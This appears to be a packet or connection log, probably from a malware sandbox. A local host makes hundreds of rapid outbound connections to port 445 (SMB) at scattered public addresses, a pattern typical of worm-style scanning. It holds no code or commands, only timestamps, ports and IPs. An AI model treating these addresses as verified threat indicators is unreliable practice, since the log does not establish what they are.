Apr 29, 2023 00:52:59.629535913 CEST	50226	445	192.168.2.4	169.211.28.119
Apr 29, 2023 00:52:59.631100893 CEST	50227	445	192.168.2.4	96.128.124.118
Apr 29, 2023 00:52:59.632163048 CEST	50228	445	192.168.2.4	23.28.101.129
Apr 29, 2023 00:52:59.632213116 CEST	50230	445	192.168.2.4	29.199.75.216
Apr 29, 2023 00:52:59.632282019 CEST	50229	445	192.168.2.4	177.230.34.171
Apr 29, 2023 00:52:59.632285118 CEST	50231	445	192.168.2.4	88.205.236.72
Apr 29, 2023 00:52:59.632339954 CEST	50232	445	192.168.2.4	38.94.235.213
Apr 29, 2023 00:52:59.632460117 CEST	50233	445	192.168.2.4	72.168.150.67
Apr 29, 2023 00:52:59.766536951 CEST	50234	445	192.168.2.4	132.64.41.6
Apr 29, 2023 00:52:59.776421070 CEST	50235	445	192.168.2.4	152.98.74.190
Apr 29, 2023 00:52:59.967511892 CEST	50236	445	192.168.2.4	107.117.77.128
Apr 29, 2023 00:53:00.570914984 CEST	50237	445	192.168.2.4	72.235.227.118
Apr 29, 2023 00:53:00.664865017 CEST	50238	445	192.168.2.4	138.251.189.5
Apr 29, 2023 00:53:00.665249109 CEST	50239	445	192.168.2.4	145.17.0.60
Apr 29, 2023 00:53:00.665745974 CEST	50240	445	192.168.2.4	128.239.193.217
Apr 29, 2023 00:53:00.666059017 CEST	50241	445	192.168.2.4	146.162.228.229
Apr 29, 2023 00:53:00.745068073 CEST	50242	445	192.168.2.4	124.193.32.44
Apr 29, 2023 00:53:00.745779037 CEST	50243	445	192.168.2.4	21.9.250.142
Apr 29, 2023 00:53:00.746323109 CEST	50244	445	192.168.2.4	2.59.21.52
Apr 29, 2023 00:53:00.746799946 CEST	50245	445	192.168.2.4	192.59.254.221
Apr 29, 2023 00:53:00.747191906 CEST	50246	445	192.168.2.4	54.18.169.147
Apr 29, 2023 00:53:00.747333050 CEST	50247	445	192.168.2.4	125.105.231.120
Apr 29, 2023 00:53:00.747509956 CEST	50248	445	192.168.2.4	214.194.131.200
Apr 29, 2023 00:53:00.748373985 CEST	50249	445	192.168.2.4	11.220.231.238
Apr 29, 2023 00:53:00.748648882 CEST	50250	445	192.168.2.4	11.41.132.60
Apr 29, 2023 00:53:00.748747110 CEST	50251	445	192.168.2.4	173.175.194.232
Apr 29, 2023 00:53:00.887620926 CEST	50252	445	192.168.2.4	126.90.94.4
Apr 29, 2023 00:53:00.887624025 CEST	50253	445	192.168.2.4	104.35.61.203
Apr 29, 2023 00:53:01.086685896 CEST	50254	445	192.168.2.4	206.181.71.208
Apr 29, 2023 00:53:01.680924892 CEST	50255	445	192.168.2.4	144.136.176.218
Apr 29, 2023 00:53:01.712476015 CEST	50256	445	192.168.2.4	138.97.224.74
Apr 29, 2023 00:53:01.774307966 CEST	50258	445	192.168.2.4	215.146.231.104
Apr 29, 2023 00:53:01.774337053 CEST	50257	445	192.168.2.4	97.91.191.20
Apr 29, 2023 00:53:01.774478912 CEST	50260	445	192.168.2.4	19.160.80.29
Apr 29, 2023 00:53:01.774485111 CEST	50259	445	192.168.2.4	164.144.241.28
Apr 29, 2023 00:53:01.852349997 CEST	50261	445	192.168.2.4	174.11.228.68
Apr 29, 2023 00:53:01.852394104 CEST	50262	445	192.168.2.4	26.250.241.67
Apr 29, 2023 00:53:01.852741957 CEST	50263	445	192.168.2.4	160.102.114.112
Apr 29, 2023 00:53:01.868973970 CEST	50264	445	192.168.2.4	153.156.248.16
Apr 29, 2023 00:53:01.870455027 CEST	50265	445	192.168.2.4	67.84.4.171
Apr 29, 2023 00:53:01.873580933 CEST	50267	445	192.168.2.4	31.210.70.141
Apr 29, 2023 00:53:01.873619080 CEST	50266	445	192.168.2.4	53.80.19.118
Apr 29, 2023 00:53:01.873694897 CEST	50268	445	192.168.2.4	113.240.41.219
Apr 29, 2023 00:53:01.873737097 CEST	50270	445	192.168.2.4	150.217.233.212
Apr 29, 2023 00:53:01.873761892 CEST	50269	445	192.168.2.4	129.27.22.108
Apr 29, 2023 00:53:01.993172884 CEST	50272	445	192.168.2.4	107.207.76.72
Apr 29, 2023 00:53:01.993175030 CEST	50271	445	192.168.2.4	68.88.123.84
Apr 29, 2023 00:53:02.196589947 CEST	50273	445	192.168.2.4	151.71.84.166
Apr 29, 2023 00:53:02.805422068 CEST	50274	445	192.168.2.4	214.197.7.201
Apr 29, 2023 00:53:02.836673975 CEST	50275	445	192.168.2.4	183.245.116.218
Apr 29, 2023 00:53:02.899540901 CEST	50276	445	192.168.2.4	206.52.28.111
Apr 29, 2023 00:53:02.899708986 CEST	50277	445	192.168.2.4	213.192.5.156
Apr 29, 2023 00:53:02.899768114 CEST	50278	445	192.168.2.4	71.253.69.8
Apr 29, 2023 00:53:02.899876118 CEST	50279	445	192.168.2.4	148.62.162.158
Apr 29, 2023 00:53:02.978490114 CEST	50280	445	192.168.2.4	120.83.171.157
Apr 29, 2023 00:53:02.978857994 CEST	50281	445	192.168.2.4	43.184.100.173
Apr 29, 2023 00:53:02.979446888 CEST	50282	445	192.168.2.4	188.77.1.19
Apr 29, 2023 00:53:02.979979992 CEST	50283	445	192.168.2.4	57.100.209.231
Apr 29, 2023 00:53:02.980904102 CEST	50284	445	192.168.2.4	184.114.237.111
Apr 29, 2023 00:53:02.981272936 CEST	50285	445	192.168.2.4	165.227.47.144
Apr 29, 2023 00:53:02.981450081 CEST	50287	445	192.168.2.4	181.216.128.103
Apr 29, 2023 00:53:02.981457949 CEST	50286	445	192.168.2.4	30.149.19.23
Apr 29, 2023 00:53:02.982422113 CEST	50289	445	192.168.2.4	124.52.84.53
Apr 29, 2023 00:53:02.982485056 CEST	50288	445	192.168.2.4	99.35.54.216
Apr 29, 2023 00:53:03.113625050 CEST	445	50285	165.227.47.144	192.168.2.4
Apr 29, 2023 00:53:03.118458986 CEST	50290	445	192.168.2.4	221.251.32.17
Apr 29, 2023 00:53:03.118748903 CEST	50291	445	192.168.2.4	187.137.103.194
Apr 29, 2023 00:53:03.321422100 CEST	50292	445	192.168.2.4	166.180.133.249
Apr 29, 2023 00:53:03.617752075 CEST	50285	445	192.168.2.4	165.227.47.144
Apr 29, 2023 00:53:03.728152037 CEST	50293	445	192.168.2.4	190.174.127.188
Apr 29, 2023 00:53:03.752064943 CEST	445	50285	165.227.47.144	192.168.2.4
Apr 29, 2023 00:53:03.915229082 CEST	50294	445	192.168.2.4	73.233.217.65
Apr 29, 2023 00:53:03.946650028 CEST	50295	445	192.168.2.4	119.158.113.72
Apr 29, 2023 00:53:04.024518967 CEST	50296	445	192.168.2.4	158.218.70.150
Apr 29, 2023 00:53:04.024657011 CEST	50297	445	192.168.2.4	47.159.191.158
Apr 29, 2023 00:53:04.024790049 CEST	50298	445	192.168.2.4	133.103.251.138
Apr 29, 2023 00:53:04.024955988 CEST	50299	445	192.168.2.4	27.102.78.97
Apr 29, 2023 00:53:04.087120056 CEST	50301	445	192.168.2.4	99.249.69.163
Apr 29, 2023 00:53:04.087136030 CEST	50300	445	192.168.2.4	14.172.200.215
Apr 29, 2023 00:53:04.087268114 CEST	50302	445	192.168.2.4	123.219.157.178
Apr 29, 2023 00:53:04.119139910 CEST	50303	445	192.168.2.4	176.188.37.88
Apr 29, 2023 00:53:04.119858980 CEST	50304	445	192.168.2.4	64.229.236.92
Apr 29, 2023 00:53:04.120695114 CEST	50305	445	192.168.2.4	184.136.172.4
Apr 29, 2023 00:53:04.121320009 CEST	50306	445	192.168.2.4	181.18.41.21
Apr 29, 2023 00:53:04.122915030 CEST	50308	445	192.168.2.4	154.111.44.113
Apr 29, 2023 00:53:04.123436928 CEST	50309	445	192.168.2.4	203.134.248.109
Apr 29, 2023 00:53:04.243076086 CEST	50310	445	192.168.2.4	152.13.94.200
Apr 29, 2023 00:53:04.243190050 CEST	50311	445	192.168.2.4	154.194.70.138
Apr 29, 2023 00:53:04.446656942 CEST	50312	445	192.168.2.4	130.99.51.141
Apr 29, 2023 00:53:04.852833986 CEST	50313	445	192.168.2.4	143.148.196.22
Apr 29, 2023 00:53:05.056449890 CEST	50314	445	192.168.2.4	202.71.20.152
Apr 29, 2023 00:53:05.071799040 CEST	50315	445	192.168.2.4	142.89.208.164
Apr 29, 2023 00:53:05.140425920 CEST	50316	445	192.168.2.4	57.73.162.1
Apr 29, 2023 00:53:05.140666962 CEST	50317	445	192.168.2.4	164.180.251.67
Apr 29, 2023 00:53:05.140777111 CEST	50318	445	192.168.2.4	4.200.165.128
Apr 29, 2023 00:53:05.141062021 CEST	50319	445	192.168.2.4	107.203.50.252
Apr 29, 2023 00:53:05.196383953 CEST	50320	445	192.168.2.4	195.253.140.171
Apr 29, 2023 00:53:05.196553946 CEST	50321	445	192.168.2.4	47.216.165.183
Apr 29, 2023 00:53:05.196887970 CEST	50322	445	192.168.2.4	27.246.160.59
Apr 29, 2023 00:53:05.247426987 CEST	50323	445	192.168.2.4	213.211.83.152
Apr 29, 2023 00:53:05.247426987 CEST	50324	445	192.168.2.4	42.203.254.207
Apr 29, 2023 00:53:05.247494936 CEST	50325	445	192.168.2.4	217.177.75.187
Apr 29, 2023 00:53:05.247531891 CEST	50326	445	192.168.2.4	94.135.97.98
Apr 29, 2023 00:53:05.247584105 CEST	50327	445	192.168.2.4	23.252.130.247
Apr 29, 2023 00:53:05.247642040 CEST	50329	445	192.168.2.4	44.119.222.240
Apr 29, 2023 00:53:05.247848988 CEST	50328	445	192.168.2.4	197.138.176.247
Apr 29, 2023 00:53:05.358572960 CEST	50331	445	192.168.2.4	94.240.219.8
Apr 29, 2023 00:53:05.358709097 CEST	50330	445	192.168.2.4	85.106.37.232
Apr 29, 2023 00:53:05.571336985 CEST	50332	445	192.168.2.4	192.12.174.246
Apr 29, 2023 00:53:05.744173050 CEST	50333	445	192.168.2.4	180.63.215.58
Apr 29, 2023 00:53:05.962755919 CEST	50334	445	192.168.2.4	76.54.28.205
Apr 29, 2023 00:53:06.181586981 CEST	50336	445	192.168.2.4	146.167.231.76
Apr 29, 2023 00:53:06.181596041 CEST	50335	445	192.168.2.4	156.53.226.130
Apr 29, 2023 00:53:06.261657000 CEST	50338	445	192.168.2.4	105.212.79.200
Apr 29, 2023 00:53:06.261661053 CEST	50337	445	192.168.2.4	154.49.55.181
Apr 29, 2023 00:53:06.261748075 CEST	50339	445	192.168.2.4	55.192.201.252
Apr 29, 2023 00:53:06.262017012 CEST	50340	445	192.168.2.4	136.189.145.10
Apr 29, 2023 00:53:06.325706959 CEST	50341	445	192.168.2.4	95.195.84.236
Apr 29, 2023 00:53:06.325881958 CEST	50342	445	192.168.2.4	79.51.32.207
Apr 29, 2023 00:53:06.326240063 CEST	50343	445	192.168.2.4	168.237.145.146
Apr 29, 2023 00:53:06.370215893 CEST	50344	445	192.168.2.4	49.240.223.113
Apr 29, 2023 00:53:06.370806932 CEST	50345	445	192.168.2.4	58.85.178.219
Apr 29, 2023 00:53:06.371795893 CEST	50346	445	192.168.2.4	77.193.228.210
Apr 29, 2023 00:53:06.373349905 CEST	50347	445	192.168.2.4	9.86.56.199
Apr 29, 2023 00:53:06.373425961 CEST	50348	445	192.168.2.4	153.253.232.248
Apr 29, 2023 00:53:06.373460054 CEST	50349	445	192.168.2.4	7.65.143.236
Apr 29, 2023 00:53:06.373517036 CEST	50350	445	192.168.2.4	141.32.41.149
Apr 29, 2023 00:53:06.478492975 CEST	50351	445	192.168.2.4	70.178.41.54
Apr 29, 2023 00:53:06.479073048 CEST	50352	445	192.168.2.4	150.100.177.189
Apr 29, 2023 00:53:06.591614962 CEST	80	49687	192.229.221.95	192.168.2.4
Apr 29, 2023 00:53:06.591753006 CEST	49687	80	192.168.2.4	192.229.221.95
Apr 29, 2023 00:53:06.680875063 CEST	50353	445	192.168.2.4	94.148.104.238
Apr 29, 2023 00:53:06.853562117 CEST	50354	445	192.168.2.4	83.124.77.14
Apr 29, 2023 00:53:07.088200092 CEST	50355	445	192.168.2.4	186.111.44.79
Apr 29, 2023 00:53:07.309609890 CEST	50356	445	192.168.2.4	203.186.236.38
Apr 29, 2023 00:53:07.309751034 CEST	50357	445	192.168.2.4	222.15.97.56
Apr 29, 2023 00:53:07.384582043 CEST	50358	445	192.168.2.4	78.53.194.99
Apr 29, 2023 00:53:07.384748936 CEST	50359	445	192.168.2.4	222.93.0.233
Apr 29, 2023 00:53:07.384934902 CEST	50360	445	192.168.2.4	68.125.1.161
Apr 29, 2023 00:53:07.385107040 CEST	50361	445	192.168.2.4	115.57.188.114
Apr 29, 2023 00:53:07.446474075 CEST	50362	445	192.168.2.4	164.22.159.224
Apr 29, 2023 00:53:07.446521997 CEST	50363	445	192.168.2.4	32.96.207.21
Apr 29, 2023 00:53:07.446739912 CEST	50364	445	192.168.2.4	189.198.251.24
Apr 29, 2023 00:53:07.494235992 CEST	50365	445	192.168.2.4	17.164.167.51
Apr 29, 2023 00:53:07.495441914 CEST	50366	445	192.168.2.4	50.158.240.46
Apr 29, 2023 00:53:07.496845961 CEST	50367	445	192.168.2.4	12.221.117.164
Apr 29, 2023 00:53:07.498219967 CEST	50368	445	192.168.2.4	222.169.236.20
Apr 29, 2023 00:53:07.499404907 CEST	50369	445	192.168.2.4	204.198.120.169
Apr 29, 2023 00:53:07.500763893 CEST	50370	445	192.168.2.4	41.50.167.143
Apr 29, 2023 00:53:07.501832962 CEST	50371	445	192.168.2.4	108.67.179.211
Apr 29, 2023 00:53:07.605129957 CEST	50372	445	192.168.2.4	47.203.160.70
Apr 29, 2023 00:53:07.605129957 CEST	50373	445	192.168.2.4	124.130.34.14
Apr 29, 2023 00:53:07.760153055 CEST	50374	445	192.168.2.4	72.208.226.239
Apr 29, 2023 00:53:07.805876970 CEST	50375	445	192.168.2.4	2.104.229.2
Apr 29, 2023 00:53:07.977847099 CEST	50376	445	192.168.2.4	179.60.14.221
Apr 29, 2023 00:53:08.212244034 CEST	50377	445	192.168.2.4	167.227.198.227
Apr 29, 2023 00:53:08.430917978 CEST	50379	445	192.168.2.4	59.248.58.130
Apr 29, 2023 00:53:08.430946112 CEST	50378	445	192.168.2.4	56.219.81.206
Apr 29, 2023 00:53:08.493741035 CEST	50380	445	192.168.2.4	64.144.208.74
Apr 29, 2023 00:53:08.493742943 CEST	50381	445	192.168.2.4	5.116.203.31
Apr 29, 2023 00:53:08.493853092 CEST	50382	445	192.168.2.4	149.19.45.38
Apr 29, 2023 00:53:08.494007111 CEST	50383	445	192.168.2.4	108.139.204.58
Apr 29, 2023 00:53:08.571789026 CEST	50384	445	192.168.2.4	108.10.200.3
Apr 29, 2023 00:53:08.572040081 CEST	50385	445	192.168.2.4	205.105.249.125
Apr 29, 2023 00:53:08.572284937 CEST	50386	445	192.168.2.4	156.127.78.163
Apr 29, 2023 00:53:08.631511927 CEST	50387	445	192.168.2.4	36.179.51.195
Apr 29, 2023 00:53:08.631544113 CEST	50388	445	192.168.2.4	30.38.15.6
Apr 29, 2023 00:53:08.631762981 CEST	50389	445	192.168.2.4	31.1.18.134
Apr 29, 2023 00:53:08.631925106 CEST	50391	445	192.168.2.4	99.71.234.76
Apr 29, 2023 00:53:08.631958961 CEST	50390	445	192.168.2.4	87.140.144.0
Apr 29, 2023 00:53:08.632067919 CEST	50392	445	192.168.2.4	211.178.163.224
Apr 29, 2023 00:53:08.632102013 CEST	50393	445	192.168.2.4	214.245.60.128
Apr 29, 2023 00:53:08.743494987 CEST	50394	445	192.168.2.4	201.61.159.199
Apr 29, 2023 00:53:08.743596077 CEST	50395	445	192.168.2.4	125.187.185.44
Apr 29, 2023 00:53:08.764038086 CEST	49687	80	192.168.2.4	192.229.221.95
Apr 29, 2023 00:53:08.884392977 CEST	50396	445	192.168.2.4	163.204.80.185
Apr 29, 2023 00:53:08.931333065 CEST	50397	445	192.168.2.4	205.236.245.135
Apr 29, 2023 00:53:09.087254047 CEST	50398	445	192.168.2.4	116.57.91.112
Apr 29, 2023 00:53:09.540571928 CEST	50400	445	192.168.2.4	105.231.229.90
Apr 29, 2023 00:53:09.540724993 CEST	50401	445	192.168.2.4	10.159.170.62
Apr 29, 2023 00:53:09.627046108 CEST	50402	445	192.168.2.4	74.243.165.178
Apr 29, 2023 00:53:09.627305984 CEST	50403	445	192.168.2.4	173.71.118.82
Apr 29, 2023 00:53:09.627407074 CEST	50404	445	192.168.2.4	17.7.248.118
Apr 29, 2023 00:53:09.627526999 CEST	50405	445	192.168.2.4	154.224.212.178
Apr 29, 2023 00:53:09.681421995 CEST	50406	445	192.168.2.4	41.151.39.10
Apr 29, 2023 00:53:09.681606054 CEST	50407	445	192.168.2.4	54.12.46.132
Apr 29, 2023 00:53:09.681749105 CEST	50408	445	192.168.2.4	13.167.33.33
Apr 29, 2023 00:53:09.746073008 CEST	50410	445	192.168.2.4	15.183.127.162
Apr 29, 2023 00:53:09.746100903 CEST	50409	445	192.168.2.4	38.94.43.48
Apr 29, 2023 00:53:09.746206999 CEST	50412	445	192.168.2.4	96.133.134.102
Apr 29, 2023 00:53:09.746294022 CEST	50413	445	192.168.2.4	1.241.202.174
Apr 29, 2023 00:53:09.746295929 CEST	50411	445	192.168.2.4	196.26.115.169
Apr 29, 2023 00:53:09.746361017 CEST	50415	445	192.168.2.4	67.141.238.44
Apr 29, 2023 00:53:09.746375084 CEST	50414	445	192.168.2.4	78.192.233.228
Apr 29, 2023 00:53:09.775185108 CEST	50416	445	192.168.2.4	163.164.215.241
Apr 29, 2023 00:53:09.852936029 CEST	50417	445	192.168.2.4	104.39.60.4
Apr 29, 2023 00:53:09.852971077 CEST	50418	445	192.168.2.4	97.211.66.156
Apr 29, 2023 00:53:09.994359970 CEST	50419	445	192.168.2.4	80.151.87.112
Apr 29, 2023 00:53:10.047974110 CEST	50420	445	192.168.2.4	117.98.225.189
Apr 29, 2023 00:53:10.196772099 CEST	50421	445	192.168.2.4	186.223.30.98
Apr 29, 2023 00:53:10.431170940 CEST	50422	445	192.168.2.4	72.125.127.56
Apr 29, 2023 00:53:10.666325092 CEST	50423	445	192.168.2.4	86.250.144.126
Apr 29, 2023 00:53:10.666482925 CEST	50424	445	192.168.2.4	101.115.190.113
Apr 29, 2023 00:53:10.728018999 CEST	50425	445	192.168.2.4	207.203.59.117
Apr 29, 2023 00:53:10.728275061 CEST	50426	445	192.168.2.4	184.136.157.0
Apr 29, 2023 00:53:10.728336096 CEST	50427	445	192.168.2.4	7.174.217.54
Apr 29, 2023 00:53:10.728585005 CEST	50428	445	192.168.2.4	7.132.153.206
Apr 29, 2023 00:53:10.811758995 CEST	50430	445	192.168.2.4	98.200.99.241
Apr 29, 2023 00:53:10.811866045 CEST	50429	445	192.168.2.4	206.213.61.92
Apr 29, 2023 00:53:10.812032938 CEST	50431	445	192.168.2.4	23.184.85.65
Apr 29, 2023 00:53:10.869313955 CEST	50432	445	192.168.2.4	108.198.188.28
Apr 29, 2023 00:53:10.870210886 CEST	50433	445	192.168.2.4	36.76.95.241
Apr 29, 2023 00:53:10.871038914 CEST	50434	445	192.168.2.4	33.64.54.11
Apr 29, 2023 00:53:10.871921062 CEST	50435	445	192.168.2.4	69.70.101.9
Apr 29, 2023 00:53:10.872746944 CEST	50436	445	192.168.2.4	40.136.63.179
Apr 29, 2023 00:53:10.873577118 CEST	50437	445	192.168.2.4	115.251.229.213
Apr 29, 2023 00:53:10.874351025 CEST	50438	445	192.168.2.4	88.98.223.138
Apr 29, 2023 00:53:10.884701967 CEST	50439	445	192.168.2.4	68.249.52.46
Apr 29, 2023 00:53:10.978321075 CEST	50440	445	192.168.2.4	85.195.65.211
Apr 29, 2023 00:53:10.978499889 CEST	50441	445	192.168.2.4	136.211.150.76
Apr 29, 2023 00:53:11.119101048 CEST	50442	445	192.168.2.4	49.77.243.72
Apr 29, 2023 00:53:11.149935961 CEST	50443	445	192.168.2.4	142.109.15.96
Apr 29, 2023 00:53:11.306566954 CEST	50444	445	192.168.2.4	97.110.231.171
Apr 29, 2023 00:53:11.541021109 CEST	50445	445	192.168.2.4	47.234.85.81
Apr 29, 2023 00:53:11.791302919 CEST	50446	445	192.168.2.4	118.237.131.200
Apr 29, 2023 00:53:11.791675091 CEST	50447	445	192.168.2.4	146.7.186.40
Apr 29, 2023 00:53:11.823350906 CEST	50448	445	192.168.2.4	142.195.205.39
Apr 29, 2023 00:53:11.858990908 CEST	50449	445	192.168.2.4	165.187.87.38
Apr 29, 2023 00:53:11.859488964 CEST	50450	445	192.168.2.4	57.192.16.17
Apr 29, 2023 00:53:11.860266924 CEST	50451	445	192.168.2.4	17.91.112.82
Apr 29, 2023 00:53:11.860935926 CEST	50452	445	192.168.2.4	63.44.99.30
Apr 29, 2023 00:53:11.931380033 CEST	50453	445	192.168.2.4	215.139.87.200
Apr 29, 2023 00:53:11.931746960 CEST	50454	445	192.168.2.4	146.53.20.247
Apr 29, 2023 00:53:11.931929111 CEST	50455	445	192.168.2.4	199.219.128.229
Apr 29, 2023 00:53:11.994189024 CEST	50456	445	192.168.2.4	31.126.150.250
Apr 29, 2023 00:53:12.011778116 CEST	50457	445	192.168.2.4	159.173.100.202
Apr 29, 2023 00:53:12.023287058 CEST	50458	445	192.168.2.4	17.6.96.11
Apr 29, 2023 00:53:12.026360035 CEST	50459	445	192.168.2.4	156.78.150.163
Apr 29, 2023 00:53:12.026952028 CEST	50461	445	192.168.2.4	187.155.2.199
Apr 29, 2023 00:53:12.027029037 CEST	50460	445	192.168.2.4	183.120.152.81
Apr 29, 2023 00:53:12.027080059 CEST	50462	445	192.168.2.4	83.126.120.183
Apr 29, 2023 00:53:12.027124882 CEST	50463	445	192.168.2.4	2.98.79.108
Apr 29, 2023 00:53:12.045649052 CEST	445	50446	118.237.131.200	192.168.2.4
Apr 29, 2023 00:53:12.103429079 CEST	50464	445	192.168.2.4	26.237.84.170
Apr 29, 2023 00:53:12.103760004 CEST	50465	445	192.168.2.4	48.88.82.179
Apr 29, 2023 00:53:12.243908882 CEST	50466	445	192.168.2.4	20.162.109.112
Apr 29, 2023 00:53:12.275418043 CEST	50467	445	192.168.2.4	175.216.112.0
Apr 29, 2023 00:53:12.415642977 CEST	50468	445	192.168.2.4	39.13.218.150
Apr 29, 2023 00:53:12.556005001 CEST	50446	445	192.168.2.4	118.237.131.200
Apr 29, 2023 00:53:12.669799089 CEST	50469	445	192.168.2.4	202.34.97.196
Apr 29, 2023 00:53:12.810203075 CEST	445	50446	118.237.131.200	192.168.2.4
Apr 29, 2023 00:53:12.915751934 CEST	50470	445	192.168.2.4	98.159.204.197
Apr 29, 2023 00:53:12.915891886 CEST	50471	445	192.168.2.4	222.199.142.71
Apr 29, 2023 00:53:12.947433949 CEST	50472	445	192.168.2.4	138.43.116.235
Apr 29, 2023 00:53:12.962975979 CEST	50473	445	192.168.2.4	201.137.113.34
Apr 29, 2023 00:53:12.963424921 CEST	50474	445	192.168.2.4	83.235.188.51
Apr 29, 2023 00:53:12.963697910 CEST	50475	445	192.168.2.4	212.140.53.32
Apr 29, 2023 00:53:12.964087009 CEST	50476	445	192.168.2.4	179.120.173.163
Apr 29, 2023 00:53:13.041050911 CEST	50477	445	192.168.2.4	87.37.96.69
Apr 29, 2023 00:53:13.041055918 CEST	50478	445	192.168.2.4	152.4.62.35
Apr 29, 2023 00:53:13.041270971 CEST	50479	445	192.168.2.4	138.118.36.152
Apr 29, 2023 00:53:13.123584032 CEST	50480	445	192.168.2.4	111.121.39.54
Apr 29, 2023 00:53:13.166538954 CEST	50481	445	192.168.2.4	83.211.117.41
Apr 29, 2023 00:53:13.167294979 CEST	50482	445	192.168.2.4	162.141.169.98
Apr 29, 2023 00:53:13.168402910 CEST	50483	445	192.168.2.4	152.43.244.137
Apr 29, 2023 00:53:13.169440031 CEST	50484	445	192.168.2.4	190.250.130.134
Apr 29, 2023 00:53:13.170114040 CEST	50485	445	192.168.2.4	76.18.7.170
Apr 29, 2023 00:53:13.171195030 CEST	50486	445	192.168.2.4	34.202.178.235
Apr 29, 2023 00:53:13.172337055 CEST	50487	445	192.168.2.4	39.189.233.91
Apr 29, 2023 00:53:13.228230000 CEST	50488	445	192.168.2.4	149.203.4.182
Apr 29, 2023 00:53:13.228339911 CEST	50489	445	192.168.2.4	197.211.35.76
Apr 29, 2023 00:53:13.369456053 CEST	50490	445	192.168.2.4	56.243.37.148
Apr 29, 2023 00:53:13.400403976 CEST	50491	445	192.168.2.4	175.139.89.248
Apr 29, 2023 00:53:13.528037071 CEST	50492	445	192.168.2.4	194.146.34.225
Apr 29, 2023 00:53:13.547584057 CEST	445	50476	179.120.173.163	192.168.2.4
Apr 29, 2023 00:53:13.790863037 CEST	50493	445	192.168.2.4	52.191.89.142
Apr 29, 2023 00:53:13.810905933 CEST	50494	445	192.168.2.4	182.172.132.115
Apr 29, 2023 00:53:14.025501966 CEST	50495	445	192.168.2.4	128.81.103.10
Apr 29, 2023 00:53:14.025504112 CEST	50496	445	192.168.2.4	97.156.23.183
Apr 29, 2023 00:53:14.072674990 CEST	50497	445	192.168.2.4	34.45.94.227
Apr 29, 2023 00:53:14.073028088 CEST	50498	445	192.168.2.4	159.132.119.194
Apr 29, 2023 00:53:14.073374033 CEST	50499	445	192.168.2.4	23.67.242.36
Apr 29, 2023 00:53:14.073520899 CEST	50500	445	192.168.2.4	45.113.176.233
Apr 29, 2023 00:53:14.073810101 CEST	50501	445	192.168.2.4	18.16.198.141
Apr 29, 2023 00:53:14.167423010 CEST	50503	445	192.168.2.4	210.28.213.6
Apr 29, 2023 00:53:14.167423964 CEST	50502	445	192.168.2.4	77.192.61.13
Apr 29, 2023 00:53:14.167773962 CEST	50504	445	192.168.2.4	46.48.18.4
Apr 29, 2023 00:53:14.183470964 CEST	80	49692	95.140.230.192	192.168.2.4
Apr 29, 2023 00:53:14.183604956 CEST	49692	80	192.168.2.4	95.140.230.192
Apr 29, 2023 00:53:14.228458881 CEST	50505	445	192.168.2.4	152.50.85.2
Apr 29, 2023 00:53:14.296325922 CEST	50506	445	192.168.2.4	101.145.101.8
Apr 29, 2023 00:53:14.296535969 CEST	50507	445	192.168.2.4	138.239.168.45
Apr 29, 2023 00:53:14.296869040 CEST	50508	445	192.168.2.4	130.30.112.154
Apr 29, 2023 00:53:14.297048092 CEST	50509	445	192.168.2.4	196.220.83.75
Apr 29, 2023 00:53:14.297266960 CEST	50510	445	192.168.2.4	111.122.90.123
Apr 29, 2023 00:53:14.298623085 CEST	50512	445	192.168.2.4	201.228.240.123
Apr 29, 2023 00:53:14.353678942 CEST	50513	445	192.168.2.4	217.125.192.76
Apr 29, 2023 00:53:14.353688955 CEST	50514	445	192.168.2.4	131.79.238.113
Apr 29, 2023 00:53:14.494617939 CEST	50515	445	192.168.2.4	189.36.231.90
Apr 29, 2023 00:53:14.525520086 CEST	50516	445	192.168.2.4	41.183.79.62
Apr 29, 2023 00:53:14.548302889 CEST	49693	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.548428059 CEST	49694	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.548660040 CEST	49695	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.573748112 CEST	80	49695	8.248.115.254	192.168.2.4
Apr 29, 2023 00:53:14.573826075 CEST	80	49694	8.248.115.254	192.168.2.4
Apr 29, 2023 00:53:14.573848009 CEST	80	49693	8.248.115.254	192.168.2.4
Apr 29, 2023 00:53:14.573909044 CEST	49695	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.573926926 CEST	49694	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.573968887 CEST	49693	80	192.168.2.4	8.248.115.254
Apr 29, 2023 00:53:14.650197983 CEST	50517	445	192.168.2.4	40.54.244.14
Apr 29, 2023 00:53:14.916419029 CEST	50518	445	192.168.2.4	65.22.129.21
Apr 29, 2023 00:53:14.931974888 CEST	50519	445	192.168.2.4	119.157.9.80
Apr 29, 2023 00:53:15.134815931 CEST	50520	445	192.168.2.4	125.121.192.240
Apr 29, 2023 00:53:15.135056019 CEST	50521	445	192.168.2.4	152.216.139.172
Apr 29, 2023 00:53:15.183950901 CEST	50522	445	192.168.2.4	50.187.83.6
Apr 29, 2023 00:53:15.184005976 CEST	50523	445	192.168.2.4	187.116.14.62
Apr 29, 2023 00:53:15.193872929 CEST	50524	445	192.168.2.4	44.237.106.176
Apr 29, 2023 00:53:15.193958998 CEST	50525	445	192.168.2.4	163.149.135.77
Apr 29, 2023 00:53:15.194097996 CEST	50526	445	192.168.2.4	143.150.90.36
Apr 29, 2023 00:53:15.291538954 CEST	50528	445	192.168.2.4	161.214.227.40
Apr 29, 2023 00:53:15.291546106 CEST	50527	445	192.168.2.4	144.212.165.129
Apr 29, 2023 00:53:15.291728020 CEST	50529	445	192.168.2.4	14.250.150.105
Apr 29, 2023 00:53:15.338051081 CEST	50530	445	192.168.2.4	23.36.32.86
Apr 29, 2023 00:53:15.420948982 CEST	50531	445	192.168.2.4	1.45.93.74
Apr 29, 2023 00:53:15.421466112 CEST	50532	445	192.168.2.4	104.61.165.205
Apr 29, 2023 00:53:15.421917915 CEST	50533	445	192.168.2.4	75.28.109.72
Apr 29, 2023 00:53:15.422347069 CEST	50534	445	192.168.2.4	97.160.254.68
Apr 29, 2023 00:53:15.423119068 CEST	50535	445	192.168.2.4	183.145.128.23
Apr 29, 2023 00:53:15.424340963 CEST	50536	445	192.168.2.4	129.46.199.128
Apr 29, 2023 00:53:15.424534082 CEST	50537	445	192.168.2.4	151.78.49.134
Apr 29, 2023 00:53:15.463268042 CEST	50538	445	192.168.2.4	166.31.97.203
Apr 29, 2023 00:53:15.463419914 CEST	50539	445	192.168.2.4	150.16.30.254
Apr 29, 2023 00:53:15.634809017 CEST	50540	445	192.168.2.4	212.111.113.0
